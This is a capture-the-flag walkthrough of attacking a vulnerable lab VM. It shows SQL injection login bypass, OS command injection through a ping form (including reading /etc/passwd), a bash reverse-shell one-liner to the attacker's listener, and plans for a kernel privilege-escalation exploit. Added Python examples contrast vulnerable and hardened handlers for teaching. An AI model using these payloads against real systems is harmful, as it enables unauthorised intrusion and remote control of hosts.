OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 57.85 seconds

So the very first thing I thought of after trying all this was to look for an exploitable version. CUPS 1.1 has the PUT method allowed and I tried to poke around it... I got nothing. The next thing I did was look at the website running on port 80. It looks like this:

As you can see in the screenshot, I tried SQL injection on the username and password fields. In my case the '--' comment does not work in the username field but '#' does, and the SQL injection:

-> 'or'a'='a

works like a charm.

username: 'or'a'='a

password: 'or'a'='a

or

username: admin' #

password: *blank*
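To see why both payloads log you in, here is an added example of my own (not code from the original post or from the target) that builds the same string-concatenated login query against a small in-memory SQLite table with constructed users, next to a parameterised version the payloads do not get past. The table, column names and passwords are assumptions. SQLite understands the -- comment but not MySQL's #, so the comment payload below uses --; on MySQL, -- is only a comment when followed by a space, which is a common reason it "doesn't work" in a form field while # does.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the app's login DB
    (example data, not taken from the target)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("john", "letmein")])
    conn.commit()
    return conn


def render_query(username, password):
    """The query the vulnerable login builds by string concatenation.
    Kept separate so the effect of a payload can be read off the text."""
    return ("SELECT username FROM users WHERE username='" + username
            + "' AND password='" + password + "'")


def login_vulnerable(conn, username, password):
    """Login the way the target evidently does it: input pasted into the SQL.
    Returns the matched username, or None if the WHERE clause matched nothing.
    With 'or'a'='a in both fields the clause becomes
    '' OR ('a'='a' AND password='') OR 'a'='a', which is always true."""
    row = conn.execute(render_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: the input is data, never SQL text."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("'or'a'='a", "'or'a'='a"), ("admin'--", "")]:
        print(render_query(user, pw))
        print("  vulnerable ->", login_vulnerable(db, user, pw),
              "| safe ->", login_safe(db, user, pw))
```

The comment payload works because everything after -- (or # on MySQL) is discarded, so the password check never reaches the database; the parameterised version returns None for both payloads because the quotes inside them are just characters in a bound string.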

-> Try pinging some IP and look at the response. The PHP behind this form hands the address to a shell, so OS command injection is possible: we can stack our own commands onto the ping command and read their output straight off the page. ; runs the next command whether or not ping succeeded, && runs it only if ping succeeded, and | (the pipe) feeds the output of one command into the input of the next, which we do not need for now.

-> We can try out commands such as

whoami

uname

hostname

cat /etc/passwd

lsb_release

uname -r
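The ping handler pattern and its fix, as an added example of my own (not the target's PHP): run_ping_vulnerable pastes the field into a shell command line the way the page's form evidently does, so the same ; and && stacking used above turns a ping into arbitrary command execution; run_ping_safe refuses anything that is not a literal IP address and runs ping with an argument list and no shell. The function names and the -W 2 reply timeout are my choices. One caveat worth knowing before trying && on a target: the second command only runs if ping exits successfully, so if the address you put in front does not answer (or ping cannot run at all), nothing after && happens; ; runs regardless.

```python
import ipaddress
import shlex
import subprocess


def run_ping_vulnerable(target):
    """The ping form as the page implies it works: the field goes straight
    into a shell command line, so ;, && and | inside it are interpreted."""
    cmd = "ping -c 1 -W 2 " + target
    result = subprocess.run(cmd, shell=True, capture_output=True,
                            text=True, timeout=20)
    return result.stdout + result.stderr


def validate_target(target):
    """Accept only a literal IPv4/IPv6 address; anything else is refused."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError("refusing ping target: %r" % target) from None


def quoted_command(target):
    """If a shell really must be used, shlex.quote turns the whole field
    into a single argument so its metacharacters lose their meaning."""
    return "ping -c 1 -W 2 " + shlex.quote(target)


def run_ping_safe(target):
    """Validated target passed as one argv element, with no shell at all."""
    argv = ["ping", "-c", "1", "-W", "2", validate_target(target)]
    result = subprocess.run(argv, capture_output=True, text=True, timeout=20)
    return result.stdout + result.stderr


if __name__ == "__main__":
    # Same stacking as on the page: ping, then our own command regardless.
    print(run_ping_vulnerable("127.0.0.1; id"))
    try:
        run_ping_safe("127.0.0.1; id")
    except ValueError as exc:
        print("hardened handler:", exc)
```

With the vulnerable handler the output of id appears after (or instead of) the ping output; the hardened handler never reaches ping because the payload is not an IP address.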

-> For now let's open an interactive bash shell and connect it back to our machine for a better view. Before submitting, start a listener on your machine on any port (in my case 4444), then enter the following in the ping input box:

-> Listen on Kali:

-> 192.168.0.1 && bash -i >& /dev/tcp/192.168.0.106/4444 0>&1

192.168.0.106 is my Kali machine, and netcat is listening on it.

Once you submit this, the page stays busy (the PHP process is blocked for as long as the shell is alive), and netcat will tell us that we got the bash shell.

Now this shell is no different from the one we had through the web form, but it is much easier to work with. If you run whoami, the response is apache, which means we are not root and are limited to what the apache user can do. To get past this we need a vulnerability in the system itself, or in a service on some port, that lets us escalate privileges. After looking around a bit, I checked the kernel version.

A little searching on kernel 2.6.9 will give you an exploit:

Let's download the exploit. We are not allowed to write to any directory other than /tmp, so we download it into the /tmp/ directory and run it from there.